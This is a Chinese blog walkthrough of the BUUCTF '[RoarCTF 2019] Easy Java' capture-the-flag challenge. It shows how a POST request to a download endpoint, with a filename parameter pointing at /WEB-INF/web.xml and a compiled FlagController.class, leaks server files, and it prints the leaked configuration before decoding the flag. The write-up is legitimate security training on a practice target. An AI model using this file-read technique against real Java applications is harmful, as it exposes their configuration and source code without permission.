【靶场练习】BUUCTF——[RoarCTF 2019]Easy Java

前言

注册BUUCTF:https://buuoj.cn/
打开搜索 easy_java,然后启动靶机,开始练习~
【靶场练习】BUUCTF——[RoarCTF 2019]Easy Java_第1张图片

尝试并寻找突破口

点击 help,获得提示,应该有个help.docx文件。
【靶场练习】BUUCTF——[RoarCTF 2019]Easy Java_第2张图片
所以访问http://a1e823e2-2d18-4639-8242-6db593857e71.node4.buuoj.cn:81/help.docx,下载查看。
【靶场练习】BUUCTF——[RoarCTF 2019]Easy Java_第3张图片

em--------------------有点悲伤,flag不在这里
【靶场练习】BUUCTF——[RoarCTF 2019]Easy Java_第4张图片
但是,既然可以通过访问目录下载文件,那我们肯定要尝试下载一些敏感信息文件啦~比如尝试一下/WEB-INF/web.xml

补充说明————————————————
 WEB-INF主要包含一下文件或目录: 
/WEB-INF/web.xml:Web应用程序配置文件,描述了 servlet 和其他的应用组件配置及命名规则。 
/WEB-INF/classes/:含了站点所有用的 class 文件,包括 servlet class 和非servlet class,他们不能包含在 .jar文件中 
/WEB-INF/lib/:存放web应用需要的各种JAR文件,放置仅在这个应用中要求使用的jar文件,如数据库驱动jar文件 
/WEB-INF/src/:源码目录,按照包名结构放置各个java文件。 
/WEB-INF/database.properties:数据库配置文件


GET请求不行,换成POST,提示URL不对,加上Download目录【这个目录在点击helo的时候,自己就出现的】
【靶场练习】BUUCTF——[RoarCTF 2019]Easy Java_第5张图片
【靶场练习】BUUCTF——[RoarCTF 2019]Easy Java_第6张图片

果然,有重大发现


-<web-app version="4.0" xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee http://xmlns.jcp.org/xml/ns/javaee/web-app_4_0.xsd" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns="http://xmlns.jcp.org/xml/ns/javaee">
-<welcome-file-list>
<welcome-file>Indexwelcome-file>
welcome-file-list>
-<servlet>
<servlet-name>IndexControllerservlet-name>
<servlet-class>com.wm.ctf.IndexControllerservlet-class>
servlet>
-<servlet-mapping>
<servlet-name>IndexControllerservlet-name>
<url-pattern>/Indexurl-pattern>
servlet-mapping>
-<servlet>
<servlet-name>LoginControllerservlet-name>
<servlet-class>com.wm.ctf.LoginControllerservlet-class>
servlet>
-<servlet-mapping>
<servlet-name>LoginControllerservlet-name>
<url-pattern>/Loginurl-pattern>
servlet-mapping>
-<servlet>
<servlet-name>DownloadControllerservlet-name>
<servlet-class>com.wm.ctf.DownloadControllerservlet-class>
servlet>
-<servlet-mapping>
<servlet-name>DownloadControllerservlet-name>
<url-pattern>/Downloadurl-pattern>
servlet-mapping>
-<servlet>
<servlet-name>FlagControllerservlet-name>
<servlet-class>com.wm.ctf.FlagControllerservlet-class>
servlet>
-<servlet-mapping>
<servlet-name>FlagControllerservlet-name>
<url-pattern>/Flagurl-pattern>
servlet-mapping>
web-app>

【靶场练习】BUUCTF——[RoarCTF 2019]Easy Java_第7张图片

进一步分析payload

这段代码很关键呀,但是我们怎么找出flag呢?
科普:servlet:Servlet(Server Applet)是Java Servlet的简称,称为小服务程序或服务连接器,用Java编写的服务器端程序,具有独立于平台和协议的特性,主要功能在于交互式地浏览和生成数据,生成动态Web内容。(来源百度百科)
其实说明了这个就是JAVA源代码进行编译后所产生的后缀带有.class的东西。于是我们可以下载这个.class文件再利用反编译手段来获得flag。

-<servlet>
<servlet-name>FlagControllerservlet-name>
<servlet-class>com.wm.ctf.FlagControllerservlet-class>
servlet>
-<servlet-mapping>
<servlet-name>FlagControllerservlet-name>
<url-pattern>/Flagurl-pattern>

所以payload就是,filename=/WEB-INF/classes/com/wm/ctf/FlagController.class
【靶场练习】BUUCTF——[RoarCTF 2019]Easy Java_第8张图片
打开文件,内容如下:

漱壕   4 +
   	     
   !  " flag Ljava/lang/String; <init> ()V Code LineNumberTable doGet R(Ljavax/servlet/http/HttpServletRequest;Ljavax/servlet/http/HttpServletResponse;)V 
Exceptions # $ 
SourceFile FlagController.java RuntimeVisibleAnnotations %Ljavax/servlet/annotation/WebServlet; name FlagController   <h1>Flag is nearby ~ Come on! ! !h1> ( ) * javax/servlet/http/HttpServlet javax/servlet/ServletException java/io/IOException &javax/servlet/http/HttpServletResponse 	getWriter ()Ljava/io/PrintWriter; java/io/PrintWriter print (Ljava/lang/String;)V !        	 
        
   '     *?*??      
    
       
   .     ,? N-??             
                      s 

看到提示了吗?“Flag is nearby ~ Come on! ! !”
所以前后找找,发现前面有一串疑似base64编码的字符串,复制去解码。得到flag啦~
【靶场练习】BUUCTF——[RoarCTF 2019]Easy Java_第9张图片

提交格式

提交的时候需要把这整个串“flag{******************************}”都粘贴进去才行哦~
【靶场练习】BUUCTF——[RoarCTF 2019]Easy Java_第10张图片

写在最后的心情小记

也不知道是什么原因,我启动靶机之后,打不开。刚开始以为靶机有问题,然后我疯狂重开。
后来,让周围的人打开能打开,然后又让群友打开也能打开,但是我换了几个浏览器都打不开!!!!
重启几次也不行,改本地hosts文件、关掉代理、设置防火墙允许浏览器通过、、、、网上能找到的办法我似乎都尝试了。
最后,热心群友让我打开VPN,开启系统代理,然后能打开了~这才成功完成了这第一次ctf题目的尝试。
太难受了,搞了三小时打不开靶机,打开之后5分钟解决做完题,这谁不难过呀,哎。
没事没事,以后指不定记知道是什么问题了,然后就能尽量避免这种奇奇怪怪的问题啦~

你可能感兴趣的:(#,靶场相关,小迪安全学习,web安全)